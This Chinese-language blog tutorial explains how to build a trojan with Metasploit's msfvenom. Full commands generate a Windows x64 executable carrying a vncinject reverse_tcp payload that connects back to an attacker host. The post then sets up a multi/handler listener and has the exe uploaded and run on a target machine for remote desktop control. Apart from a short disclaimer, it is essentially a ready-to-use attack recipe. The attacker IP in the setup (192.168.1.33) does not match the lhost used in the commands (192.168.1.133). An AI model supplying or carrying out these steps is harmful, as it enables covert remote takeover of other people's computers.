龙空技术网

Metasploit -- 木马生成原理和方法

之乎者也吧呀 796

前言:

当前我们对“木马程序原理”大体比较注意,各位老铁们都需要知道一些“木马程序原理”的相关知识。那么小编也在网络上收集了一些关于“木马程序原理””的相关资讯,希望姐妹们能喜欢,咱们快快来了解一下吧!

以前的人,要疯要癫要崩溃,都特别戏剧化,比如披头散发,涕泗横流,瞠目结舌等等。现在的人不会,他就静静地坐在那里,面无表情,不声不响,看着很正常,但禁不起触碰。你上前轻轻碰一下,问一句,他就垮了,就崩溃了。。。

---- 网易云热评

一、生成方式:利用msf模块中的msfvenom模块

二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

三、msfvenom命令行选项如下

-p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定

-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

-n, --nopsled <length> 为payload预先指定一个NOP滑动长度

-f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)

-e, --encoder [encoder] 指定需要使用的encoder(编码器)

-a, --arch <architecture> 指定payload的目标架构

--platform <platform> 指定payload的目标平台

-s, --space <length> 设定有效攻击荷载的最大长度

-b, --bad-chars <list> 设定规避字符集,比如: '\x00\xff'

-i, --iterations <count> 指定payload的编码次数

-c, --add-code <path> 指定一个附加的win32 shellcode文件

-x, --template <path> 指定一个自定义的可执行文件作为模板

-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行

--payload-options 列举payload的标准选项

-o, --out <path> 保存payload

-v, --var-name <name> 指定一个自定义的变量,以确定输出格式

--shellest 最小化生成payload

-h, --help 查看帮助选项

--help-formats 查看msf支持的输出格式列表

四、使用方法

1、msfvenom --list platforms 显示支持的平台

2、msfvenom --list formats 显示支持的格式

3、msfvenom --list archs 显示支持的架构

4、msfvenom --list encoders 显示支持的编码器

5、生成木马

目标主机:192.168.1.129(win7 x64)

攻击机:192.168.1.33

攻击端口:12121

生成木马:msfvenom --arch x64 --platform windows -p windows/x64/vncinject/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe

6、进入监听模块 use exploit/multi/handler

7、设置payload反弹 set payload windows/x64/vncinject/reverse_tcp

8、查看需要设置的参数:show options

9、设置攻击机ip:set lhost 192.168.1.133

10、设置攻击端口:set lport 12121

11、将生成的exe文件上传到目标主机并运行

12、run攻击

13、攻击机的监控画面

14、目标主机画面

禁止非法,后果自负

欢迎关注公众号:web安全工具库

标签: #木马程序原理